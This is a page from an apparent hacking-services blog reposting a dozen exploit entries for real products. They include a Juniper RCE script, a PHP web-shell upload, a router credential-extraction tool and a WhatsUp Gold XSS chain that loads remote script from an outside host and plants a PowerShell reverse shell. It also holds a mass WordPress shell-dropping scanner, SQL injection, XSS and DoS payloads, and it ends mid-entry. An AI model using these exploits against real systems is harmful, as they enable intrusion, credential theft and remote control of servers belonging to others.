Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863110970

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# ***************************************************************************************************
# Exploit Title: juniper-SRX-Firewalls&EX-switches (PreAuth-RCE) (PoC)
# Description:
#
# This code serves as both a vulnerability detector and a proof of concept for CVE-2023-36845.
# It executes the phpinfo() function on the login page of the target device, 
# allowing to inspect the PHP configuration. also this script has the option to save the phpinfo() 
# output to a file for further analysis.
#
# Shodan Dork: http.favicon.hash:2141724739
# Date: 2023/10/01
# Exploit Author: whiteOwl (whiteowl.pub@gmail.com)
# Vendor Homepage: https://whiteowl-pub.github.io
# Version: Versions Prior to 20.4R3-S9,21.1R1,21.2R3-S7,21.3R3-S5,
#          21.4R3-S5,22.1R3-S4,22.2R3-S2,22.3R2-S2/R3-S1,22.
#          4R2-S1/R3,23.2R1-S1/R2
# Tested on: JUNOS SM804122pri 15.1X49-D170.4
# CVE : cve-2023-36845
# ***************************************************************************************************

import argparse
import requests

banner = """
*************************************************************
* CVE-2023-36845 Vulnerability Detector & Proof of concept  *
* This script checks for the CVE-2023-36845 vulnerability   *
* and run phpinfo() on vulnerable devices.                  *
* If you suspect a vulnerable system, please take action    *
* immediately to secure it.                                 *
*                                                           *
* Author: whiteowl                                          *
*************************************************************
"""

def send_request(url, output_file=None, verbose=False):
    target_url = f"{url}/?PHPRC=/dev/fd/0"
    data = 'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'

    headers = {
        'User-Agent': 'Mozilla/5.0',
    }

    try:
        response = requests.post(target_url, headers=headers, data=data, stream=True)
        if response.status_code == 200:
            print("The Target Device is Vulnerable to: CVE-2023-36845")
        else:
            print("Not Vulnerable: Status Code", response.status_code)
            
        if output_file:
            with open(output_file, 'w', encoding='utf-8') as file:
                file.write(response.text)

        if verbose:
            print(f"HTTP Status Code: {response.status_code}")
            print("Response Headers:")
            for header, value in response.headers.items():
                print(f"{header}: {value}")
            print("Response Content:")
            print(response.text)
    except requests.exceptions.RequestException as e:
        print(f"An error occurred: {e}")

def main():
    print(banner) 
    parser = argparse.ArgumentParser(description="Custom curl-like script")
    parser.add_argument("-u", "--url", required=True, help="URL to send the HTTP request")
    parser.add_argument("-o", "--output", help="Output file to save the HTML content")
    parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose mode")

    args = parser.parse_args()
    send_request(args.url, args.output, args.verbose)

if __name__ == "__main__":
    main()
HireHackking 
# Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE
# Date: 07.10.2023
# Exploit Author: Oğulcan Hami Gül
# Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code
# Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10

## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication.

POST /pms/users.php HTTP/1.1

Host: 192.168.1.36

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: multipart/form-data; boundary=---------------------------421755697017784551042596452367

Content-Length: 1054

Origin: http://192.168.1.36

Connection: close

Referer: http://192.168.1.36/pms/users.php

Upgrade-Insecure-Requests: 1



-----------------------------421755697017784551042596452367

Content-Disposition: form-data; name="display_name"



sefa7

-----------------------------421755697017784551042596452367

Content-Disposition: form-data; name="user_name"



sefa7

-----------------------------421755697017784551042596452367

Content-Disposition: form-data; name="password"



sefa7

-----------------------------421755697017784551042596452367

Content-Disposition: form-data; name="profile_picture"; filename="simple-backdoor.php"

Content-Type: application/x-php



<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->


-----------------------------421755697017784551042596452367

Content-Disposition: form-data; name="save_user"





-----------------------------421755697017784551042596452367--


## After the file upload request sent by attacker, Application adds a random number to the beginning of the file to be uploaded. Malicious file can be seen under the path /pms/users.php without any authentication.

## With the request http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami the attacker can execute arbitrary command on the application server.
HireHackking

MISP 2.4.171 - Stored XSS 

# Exploit Title: MISP 2.4.171 Stored XSS [CVE-2023-37307] (Authenticated)
# Date: 8th October 2023
# Exploit Author: Mücahit Çeri
# Vendor Homepage: https://www.circl.lu/
# Software Link: https://github.com/MISP/MISP
# Version: 2.4.171
# Tested on: Ubuntu 20.04
# CVE : CVE-2023-37307

# Exploit:
Logged in as low privileged account

1)Click on the "Galaxies" button in the top menu
2)Click "Add Cluster" in the left menu.
3)Enter the payload "</title><script>alert(1)</script>" in the Name parameter.
4)Other fields are filled randomly. Click on Submit button.
5)When the relevant cluster is displayed, we see that alert(1) is running
HireHackking 
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""
Title: Credential Leakage Through Unprotected System Logs and Weak Password Encryption
CVE: CVE-2023-43261
Script Author: Bipin Jitiya (@win3zz)
Vendor: Milesight IoT - https://www.milesight-iot.com/ (Formerly Xiamen Ursalink Technology Co., Ltd.)
Software/Hardware: UR5X, UR32L, UR32, UR35, UR41 and there might be other Industrial Cellular Router could also be vulnerable.
Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10
Writeup: https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf
"""

import sys
import requests
import re
import warnings
from Crypto.Cipher import AES # pip install pycryptodome
from Crypto.Util.Padding import unpad
import base64
import time

warnings.filterwarnings("ignore")

KEY = b'1111111111111111'
IV = b'2222222222222222'

def decrypt_password(password):
    try:
        return unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(password)), AES.block_size).decode('utf-8')
    except ValueError as e:
        display_output('      [-] Error occurred during password decryption: ' + str(e), 'red')

def display_output(message, color):
    colors = {'red': '\033[91m', 'green': '\033[92m', 'blue': '\033[94m', 'yellow': '\033[93m', 'cyan': '\033[96m', 'end': '\033[0m'}
    print(f"{colors[color]}{message}{colors['end']}")
    time.sleep(0.5)

urls = []

if len(sys.argv) == 2:
    urls.append(sys.argv[1])

if len(sys.argv) == 3 and sys.argv[1] == '-f':
    with open(sys.argv[2], 'r') as file:
        urls.extend(file.read().splitlines())

if len(urls) == 0:
    display_output('Please provide a URL or a file with a list of URLs.', 'red')
    display_output('Example: python3 ' + sys.argv[0] + ' https://example.com', 'blue')
    display_output('Example: python3 ' + sys.argv[0] + ' -f urls.txt', 'blue')
    sys.exit()

use_proxy = False
proxies = {'http': 'http://127.0.0.1:8080/'} if use_proxy else None

for url in urls:
    display_output('[*] Initiating data retrieval for: ' + url + '/lang/log/httpd.log', 'blue')
    response = requests.get(url + '/lang/log/httpd.log', proxies=proxies, verify=False)

    if response.status_code == 200:
        display_output('[+] Data retrieval successful for: ' + url + '/lang/log/httpd.log', 'green')
        data = response.text
        credentials = set(re.findall(r'"username":"(.*?)","password":"(.*?)"', data))

        num_credentials = len(credentials)
        display_output(f'[+] Found {num_credentials} unique credentials for: ' + url, 'green')

        if num_credentials > 0:
            display_output('[+] Login page: ' + url + '/login.html', 'green')
            display_output('[*] Extracting and decrypting credentials for: ' + url, 'blue')
            display_output('[+] Unique Credentials:', 'yellow')
            for i, (username, password) in enumerate(credentials, start=1):
                display_output(f'    Credential {i}:', 'cyan')
                decrypted_password = decrypt_password(password.encode('utf-8'))
                display_output(f'      - Username: {username}', 'green')
                display_output(f'      - Password: {decrypted_password}', 'green')
        else:
            display_output('[-] No credentials found in the retrieved data for: ' + url, 'red')
    else:
        display_output('[-] Data retrieval failed. Please check the URL: ' + url, 'red')
HireHackking

WhatsUp Gold 2022 (22.1.0 Build 39) - XSS

HACKER · %s · %s

# Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS) # Date: April 18, 2023 # Exploit Author: Andreas Finstad (4ndr34z) # Vendor Homepage: https://www.whatsupgold.com # Version: v.22.1.0 Build 39 # Tested on: Windows 2022 Server # CVE : CVE-2023-35759 # Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759 WhatsUp Gold 2022 (22.1.0 Build 39) Stored XSS in sysName SNMP parameter. Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39) Product Name: WhatsUp Gold 2022 Version: 22.1.0 Build 39 Vulnerability Type: Stored Cross-Site Scripting (XSS) Description: WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field on a device, which reflects the input from the SNMP device into the admin console after being discovered by SNMP. An attacker can exploit this vulnerability by crafting a specially crafted SNMP device name that contains malicious code. Once the device name is saved and reflected in the admin console, the injected code will execute in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions. As there is no CSRF tokens or CDP, it is trivial to create a javascript payload that adds an scheduled action on the server, that executes code as "NT System". In my POC code, I add a Powershell revshell that connects out to the attacker every 5 minutes. (screenshot3) The XSS trigger when clicking the "All names and addresses" Stage: Base64 encoded id property: var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a); Staged payload placed in the SNMP sysName Field on a device: <img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))> payload: var vhost = window.location.protocol+'\/\/'+window.location.host addaction(); async function addaction() { var arguments = '' let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{ method: 'POST', headers: { 'Connection': 'close', 'Content-Length': '1902', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"', 'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest', 'sec-ch-ua-mobile': '?0', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33', 'sec-ch-ua-platform': '"macOS"', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Dest': 'empty', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4' }, credentials: 'include', body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}' }); setTimeout(() => { getactions(); }, 1000); }; async function getactions() { const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{ method: 'GET', headers: { 'Connection': 'close', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"', 'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest', 'sec-ch-ua-mobile': '?0', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33', 'sec-ch-ua-platform': '"macOS"', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Dest': 'empty', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4' }, credentials: 'include' }); const actions = await response.json(); var results = []; var searchField = "Name"; var searchVal = "Systemtask"; for (var i=0 ; i < actions.length ; i++) { if (actions[i][searchField] == searchVal) { results.push(actions[i].Id); revshell(results[0]) } } //console.log(actions); }; async function revshell(ID) { fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{ method: 'POST', headers: { 'Connection': 'close', 'Content-Length': '2442', 'Cache-Control': 'max-age=0', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"', 'sec-ch-ua-mobile': '?0', 'sec-ch-ua-platform': '"macOS"', 'Upgrade-Insecure-Requests': '1', 'Origin': 'https://192.168.16.100', 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Sec-Fetch-Dest': 'iframe', 'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4' }, credentials: 'include', body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0' }); };
HireHackking
# Exploit Title: Advanced Page Visit Counter 1.0 - Admin+ Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 11.10.2023 # Exploit Author: Furkan ÖZER # Software Link: https://wordpress.org/plugins/advanced-page-visit-counter/ # Version: 8.0.5 # Tested on: Kali-Linux,Windows10,Windows 11 # CVE: N/A # Description: Advanced Page Visit Counter is a remarkable Google Analytics alternative specifically designed for WordPress websites, and it has quickly become a must-have plugin for website owners and administrators seeking powerful tracking and analytical capabilities. With the recent addition of Enhanced eCommerce Tracking for WooCommerce, this plugin has become even more indispensable for online store owners. Homepage | Support | Premium Version If you’re in search of a GDPR-friendly website analytics plugin exclusively designed for WordPress, look no further than Advanced Page Visit Counter. This exceptional plugin offers a compelling alternative to Google Analytics and is definitely worth a try for those seeking enhanced data privacy compliance. This is a free plugin and doesn’t require you to create an account on another site. All features outlined below are included in the free plugin. Description of the owner of the plugin Stored Cross-Site Scripting attack against the administrators or the other authenticated users. The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) The details of the discovery are given below. # Steps To Reproduce: 1. Install and activate the Advanced Page Visit Counter plugin. 2. Visit the "Settings" interface available in settings page of the plugin that is named "Widget Settings" 3. In the plugin's "Today's Count Label" setting field, enter the payload Payload: " "type=image src=1 onerror=alert(document.cookie)> " 6. Click the "Save Changes" button. 7. The XSS will be triggered on the settings page when every visit of an authenticated user. # Video Link https://youtu.be/zcfciGZLriM
HireHackking

Rail Pass Management System 1.0 - Time-Based SQL Injection

HACKER · %s · %s

# Exploit Title: Rail Pass Management System - 'searchdata' Time-Based SQL Injection # Date: 02/10/2023 # Exploit Author: Alperen Yozgat # Vendor Homepage: https://phpgurukul.com/rail-pass-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17479 # Version: 1.0 # Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30 ## Description ## On the download-pass.php page, the searchdata parameter in the search function is vulnerable to SQL injection vulnerability. ## Proof of Concept ## # After sending the payload, the response time will increase to at least 5 seconds. # Payload: 1'or+sleep(5)--+- POST /rpms/download-pass.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 36 Cookie: PHPSESSID=6028f950766b973640e0ff64485f727b searchdata=1'or+sleep(5)--+-&search=
HireHackking
# Exploit Title: Wordpress Augmented-Reality - Remote Code Execution Unauthenticated # Date: 2023-09-20 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import requests as req import json import sys import random import uuid import urllib.parse import urllib3 from multiprocessing.dummy import Pool as ThreadPool urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) filename="{}.php".format(str(uuid.uuid4())[:8]) proxies = {} #proxies = { #  'http': 'http://127.0.0.1:8080', #  'https': 'http://127.0.0.1:8080', #} phash = "l1_Lw" r=req.Session() user_agent={ "User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" } r.headers.update(user_agent) def is_json(myjson):   try:     json_object = json.loads(myjson)   except ValueError as e:     return False   return True def mkfile(target):     data={"cmd" : "mkfile", "target":phash, "name":filename}     resp=r.post(target, data=data)     respon = resp.text     if resp.status_code == 200 and is_json(respon):         resp_json=respon.replace(r"\/", "").replace("\\", "")         resp_json=json.loads(resp_json)         return resp_json["added"][0]["hash"]     else:         return False def put(target, hash):     content=req.get("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php", proxies=proxies, verify=False)     content=content.text     data={"cmd" : "put", "target":hash, "content": content}     respon=r.post(target, data=data, proxies=proxies, verify=False)     if respon.status_code == 200:       return True def exploit(target):     try:         vuln_path = "{}/wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php".format(target)         respon=r.get(vuln_path, proxies=proxies, verify=False).status_code         if respon != 200:           print("[FAIL] {}".format(target))           return         hash=mkfile(vuln_path)         if hash == False:           print("[FAIL] {}".format(target))           return         if put(vuln_path, hash):           shell_path = "{}/wp-content/plugins/augmented-reality/file_manager/{}".format(target,filename)           status = r.get(shell_path, proxies=proxies, verify=False).status_code           if status==200 :               with open("result.txt", "a") as newline:                   newline.write("{}\n".format(shell_path))                   newline.close()               print("[OK] {}".format(shell_path))               return           else:               print("[FAIL] {}".format(target))               return         else:           print("[FAIL] {}".format(target))           return     except req.exceptions.SSLError:           print("[FAIL] {}".format(target))           return     except req.exceptions.ConnectionError:           print("[FAIL] {}".format(target))           return def main():     threads = input("[?] Threads > ")     list_file = input("[?] List websites file > ")     print("[!] all result saved in result.txt")     with open(list_file, "r") as file:         lines = [line.rstrip() for line in file]         th = ThreadPool(int(threads))         th.map(exploit, lines) if __name__ == "__main__":     main()
HireHackking

Splunk 9.0.4 - Information Disclosure

HACKER · %s · %s

# Exploit Title: Splunk 9.0.4 - Information Disclosure # Date: 2023-09-18 # Exploit Author: Parsa rezaie khiabanloo # Vendor Homepage: https://www.splunk.com/ # Version: 9.0.4 # Tested on: Windows OS # Splunk through 9.0.4 allows information disclosure by appending # /__raw/services/server/info/server-info?output_mode=json to a query, # as demonstrated by discovering a license key and other information. # PoC : https://127.0.0.1:8000/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
HireHackking
VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot) Remote Denial Of Service Vendor: Video Medios, S.A. (VIMESA) Product web page: https://www.vimesa.es Affected version: img:v9.7.1 Html:v2.4 RS485:v2.5 Summary: The transmitter Blue Plus is designed with all the latest technologies, such as high efficiency using the latest generation LDMOS transistor and high efficiency power supplies. We used a modern interface and performance using a color display with touch screen, with easy management software and easy to use. The transmitter is equipped with all audio input including Audio IP for a complete audio interface. The VHF/FM transmitter 30-1000 is intended for the transmission of frequency modulated broadcasts in mono or stereo. It work with broadband characteristics in the VHF frequency range from 87.5-108 MHz and can be operated with any frequency in this range withoug alignment. The transmitter output power is variable between 10 and 110% of the nominal Power. It is available with different remote control ports. It can store up to six broadcast programs including program specific parameters such as frequency, RF output power, modulation type, RDS, AF level and deviation limiting. The transmitter is equipped with a LAN interface that permits the complete remote control of the transmitter operation via SNMP or Web Server. Desc: The device is suffering from a Denial of Service (DoS) vulnerability. An unauthenticated attacker can issue an unauthorized HTTP GET request to the unprotected endpoint 'doreboot' and restart the transmitter operations. Tested on: lighttpd/1.4.32 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5798 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5798.php 22.07.2023 -- $ curl -v "http://192.168.3.11:5007/doreboot" * Trying 192.168.3.11:5007... * Connected to 192.168.3.11 (192.168.3.11) port 5007 (#0) > GET /doreboot HTTP/1.1 > Host: 192.168.3.11:5007 > User-Agent: curl/8.0.1 > Accept: */* > * Recv failure: Connection was reset * Closing connection 0 curl: (56) Recv failure: Connection was reset
HireHackking

SISQUALWFM 7.1.319.103 - Host Header Injection

HACKER · %s · %s

# Exploit Title: SISQUALWFM 7.1.319.103 Host Header Injection # Discovered Date: 17/03/2023 # Reported Date: 17/03/2023 # Resolved Date: 13/10/2023 # Exploit Author: Omer Shaik (unknown_exploit) # Vendor Homepage: https://www.sisqualwfm.com # Version: 7.1.319.103 # Tested on: SISQUAL WFM 7.1.319.103 # Affected Version: sisqualWFM - 7.1.319.103 # Fixed Version: sisqualWFM - 7.1.319.111 # CVE : CVE-2023-36085 # CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N # Category: Web Apps A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header. **************************************************************************************************** Orignal Request **************************************************************************************************** GET /sisqualIdentityServer/core/login HTTP/2 Host: sisqualwfm.cloud Cookie:<cookie> Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 **************************************************************************************************** Orignal Response **************************************************************************************************** HTTP/2 302 Found Cache-Control: no-store, no-cache, must-revalidate Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Date: Wed, 22 Mar 2023 13:22:10 GMT Content-Length: 0 **************************************************************************************************** ██████╗ ██████╗ ██████╗ ██╔══██╗██╔═══██╗██╔════╝ ██████╔╝██║ ██║██║ ██╔═══╝ ██║ ██║██║ ██║ ╚██████╔╝╚██████╗ ╚═╝ ╚═════╝ ╚═════╝ **************************************************************************************************** Request has been modified to redirect user to 